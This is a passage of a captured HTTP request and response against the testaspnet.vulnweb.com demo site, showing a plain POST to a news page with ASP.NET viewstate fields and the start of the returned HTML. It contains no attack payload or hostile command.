          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Content-Length: 10975
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (10975 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4%2B8K4F%2F0js11lBw12IN%2FOFdqHcc%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKpz%2FfHDgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ90tjPbD69UwpHdROB4Qqxfz1aHXA%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 30429
          
          
          Response body (30429 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25n